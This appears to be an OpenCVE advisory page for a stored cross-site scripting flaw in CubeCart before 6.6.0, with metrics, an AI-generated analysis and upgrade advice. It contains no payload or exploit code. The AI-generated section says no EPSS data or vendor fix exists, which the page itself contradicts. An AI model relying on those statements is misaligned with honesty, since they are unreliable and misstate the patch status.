Description
CubeCart is an ecommerce software solution. Prior to 6.6.0, a Stored Cross-Site Scripting (XSS) vulnerability exists in CubeCart v6.x. An attacker with administrative privileges can inject malicious JavaScript payloads into multiple fields during the creation or modification of a product. These payloads are stored in the database and executed whenever a user (customer or another administrator) views the affected product pages, which could lead to session hijacking or unauthorized actions. This vulnerability is fixed in 6.6.0.
Published: 2026-05-13
Score: 4.8 Medium
EPSS: < 1% Very Low
KEV: No
Impact: n/a
Action: n/a
AI Analysis

Impact

CubeCart versions prior to 6.6.0 contain a stored XSS flaw that allows an attacker with administrative privileges to embed malicious JavaScript into product fields during creation or editing. The payload is persisted in the database and executed whenever anyone—customers or other administrators—views the affected product page, potentially enabling session hijacking or the execution of unauthorized actions.

Affected Systems

The vulnerability affects the CubeCart ecommerce platform, versions 6.x before the 6.6.0 release. All installations using these pre‑updated versions are susceptible.

Risk and Exploitability

The CVSS score of 4.8 indicates moderate severity, with no EPSS data available and the vulnerability not listed in CISA's KEV catalog. Only users with administrative rights can inject the payload, meaning that external attackers must first compromise an administrator account or obtain privileged access. Once privileged, exploitation is straightforward, and the impact includes potential compromise of user sessions and unauthorized operations.

Generated by OpenCVE AI on May 13, 2026 at 22:27 UTC.

Remediation

No vendor fix or workaround currently provided.

OpenCVE Recommended Actions

  • Upgrade CubeCart to version 6.6.0 or a later release, which removes the stored XSS vulnerability.
  • Apply proper output encoding or sanitization to all product-related input fields to prevent malicious scripts from being stored or executed.
  • Restrict administrative access and monitor for unauthorized changes to product data to reduce the likelihood of exploitation.

Generated by OpenCVE AI on May 13, 2026 at 22:27 UTC.

Tracking

Sign in to view the affected projects.

Advisories

No advisories yet.

History

Thu, 14 May 2026 15:00:00 +0000

Type Values Removed Values Added
First Time appeared Cubecart
Cubecart cubecart
Vendors & Products Cubecart
Cubecart cubecart

Thu, 14 May 2026 13:15:00 +0000

Type Values Removed Values Added
Metrics ssvc

{'options': {'Automatable': 'no', 'Exploitation': 'poc', 'Technical Impact': 'partial'}, 'version': '2.0.3'}

Wed, 13 May 2026 21:15:00 +0000

Type Values Removed Values Added
Description CubeCart is an ecommerce software solution. Prior to 6.6.0, a Stored Cross-Site Scripting (XSS) vulnerability exists in CubeCart v6.x. An attacker with administrative privileges can inject malicious JavaScript payloads into multiple fields during the creation or modification of a product. These payloads are stored in the database and executed whenever a user (customer or another administrator) views the affected product pages, which could lead to session hijacking or unauthorized actions. This vulnerability is fixed in 6.6.0.
Title CubeCart: Stored Cross-Site Scripting (XSS)
Weaknesses CWE-79
References
Metrics cvssV3_1

{'score': 4.8, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N'}

Subscriptions

Cubecart Cubecart
cve-icon MITRE

Status: PUBLISHED

Assigner: GitHub_M

Published:

Updated: 2026-05-14T12:52:08.863Z

Reserved: 2026-04-07T00:23:30.596Z

Link: CVE-2026-39428

cve-icon Vulnrichment

Updated: 2026-05-14T12:51:56.187Z

cve-icon NVD

Status : Deferred

Published: 2026-05-13T21:16:46.800

Modified: 2026-05-14T16:49:18.583

Link: CVE-2026-39428

cve-icon Redhat

No data.

cve-icon OpenCVE Enrichment

Updated: 2026-05-14T14:33:24Z

Weaknesses